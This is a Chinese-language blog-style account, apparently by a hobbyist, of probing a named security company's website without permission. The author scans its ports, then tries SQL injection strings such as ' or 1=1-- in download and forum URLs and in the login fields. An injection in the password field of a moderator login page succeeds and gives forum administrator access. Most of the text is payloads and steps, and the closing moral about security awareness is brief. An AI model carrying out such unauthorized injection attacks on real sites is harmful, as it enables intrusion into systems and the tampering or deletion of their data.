筆者一直都有經(jīng)常性地到一些安全方面的網(wǎng)站瞎逛的習慣的,最近因為一次機緣巧合之下通過鏈接來到廣州某個頗有名氣的網(wǎng)絡(luò)安全公司的網(wǎng)站。說實在的,這個網(wǎng)站好象挺多元化的,提供軟件下載之余,還有自己的論壇(嘿嘿,界面做得還真不賴嘛,不知道安全性如何呢?)。出于對其安全操守的好奇,小神決定義務(wù)為其做個的初步的“安全滲透測試”。開始時只是拿一些綜合性的網(wǎng)絡(luò)漏洞掃描工具(X-scan3.0、Nmap、Retina等等)進行信息掃描,然后做個結(jié)果篩選,結(jié)果只查到對方開了TCP80端口(也就是說他們的服務(wù)器只提供了正常的HTTP服務(wù)),且無任何典型的漏洞....沒戲了,對方畢竟還是一間有些知名度的企業(yè)嘛(因為這篇文章的重點并不在此,所以用網(wǎng)絡(luò)漏洞掃描器作信息掃描這個步驟我就不在這里多作說明了)。就這樣放棄了嗎?沒那么容易...恰好小神最近在整理SQL Injection(SQL注入攻擊)方面的資料,既然現(xiàn)在有機會就再“勉為其難”地幫它測試一下吧:P
首先是下載系統(tǒng),隨便抽一個工具的下載地址:http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444
http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444'先測試一下對方有沒有過濾'(單引號)...
再試試下面的url,看看能否返回正常的頁面...
http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444"
http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444' or 1=1--
http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444" or 1=1--
http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444' or 'a'='a
http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444" or "a"="a
都是返回“HTTP 500 - 內(nèi)部服務(wù)器錯誤”,看來是又失敗了,不怕,我們還有希望...此時的希望只
能全部寄托在論壇上了...(下圖)
循序漸進,首先找來一條帖子的url(這一步筆者挑了:http://該安全公司的網(wǎng)址/論壇目錄/list.asp
?ltid=14這條URL)重復剛剛的行為:
http://該安全公司的網(wǎng)址/論壇目錄/list.asp?ltid=14'
http://該安全公司的網(wǎng)址/論壇目錄/list.asp?ltid=14"
http://該安全公司的網(wǎng)址/論壇目錄/list.asp?ltid=14' or 1=1--
http://該安全公司的網(wǎng)址/論壇目錄/list.asp?ltid=14" or 1=1--
http://該安全公司的網(wǎng)址/論壇目錄/list.asp?ltid=14' or 'a'='a
http://該安全公司的網(wǎng)址/論壇目錄/list.asp?ltid=14" or "a"="a
不過看來還是在吃白果...(如下圖所示)
除了地址欄,不要忘了還有論壇首頁的登陸框:
在“用戶名:”區(qū)域中輸入:
網(wǎng)***' or 1=1--
然后在“密碼:”區(qū)域中隨便輸入幾個密碼看看吧:P(得到下圖)
還是不行,試試在密碼區(qū)域進行注入攻擊吧...具體操作:
在“用戶名:”中輸入:
“網(wǎng)***”
然后在“密碼:”中輸入:
' or 1=1--
(提交后得到下圖)
fail...再用:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
切換了幾次,還是不行,看來真的是“堅不可摧”了...“風繼續(xù)吹,不忍遠離...”小神的MP3里哼著‘哥哥’張國榮的歌,難道就這樣離開嗎?到論壇的首頁里再逛一圈吧....一掃眼,還真道靈光,注意一下論壇登陸區(qū)域上方的小鏈接,看到了吧?第三條鏈接是什么呢?
單擊后跳出如下圖所示的登陸窗口:
首先在“論壇:”這一攔選中相應(yīng)的版面(這里筆者挑了第一個版面“安全工具”),然后再重新嘗試一下:
帳號: 網(wǎng)***' or 1=1--
密碼: 任意密碼
不行,再試試:
帳號: 網(wǎng)***
密碼: ' or 1=1--
......
......
小神的手顫了一下,只因“有顏色的界面”出來了:
開始時以為是假象,連忙點擊“進入后臺>>>”...
這次看來是真的了,點擊其中一條帖子再測試一下:
(看到了吧?有“刪除”按鈕了也...其實我們可以做的還不只這些...PS:小神可是個好孩子哦^_^)寫到這里,也算是有個交代了吧?!^@@^
整篇文章的主旨也不過就是介紹了如何簡單地利用SQL注入攻擊滲透論壇吧,其實現(xiàn)在再談SQL注入也是老生常談了,但想不到連知名的網(wǎng)絡(luò)安全公司也有這樣的漏洞,歸根結(jié)底就是人們對安全意識的不重視而引起的,這篇文章告訴了我們:不要忽視運作中的一些小細節(jié)。
若想了解更多SQL注入技巧的相關(guān)信息歡迎登陸筆者的網(wǎng)站http://demonalex.cn.st或email:demonalex@hackermail.com與我聯(lián)系吧:)。














